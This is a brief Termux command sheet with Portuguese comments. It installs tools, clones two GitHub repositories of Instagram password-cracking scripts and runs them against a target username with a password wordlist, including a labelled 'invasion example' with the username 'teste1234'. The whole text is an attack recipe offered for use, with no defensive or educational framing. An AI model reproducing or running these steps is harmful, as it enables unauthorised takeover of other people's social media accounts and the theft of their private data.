pkg install git

pkg install python2

git clone https://github.com/Pure-L0G1C/Instagram

cd Instagram 

pip2 install -r requirements.txt

python2 instagram.py nome de usuário lista de senha
###########################
#####Exemplo de invasão#######

python2 instagram.py teste1234 /$HOME/Brute-Force/wordlist/wordlist.txt

######Como usar o instahackv2#######

git clone https://github.com/MRX8001/instahackv2

cd instahackv2

sh instahack2.sh

###############################
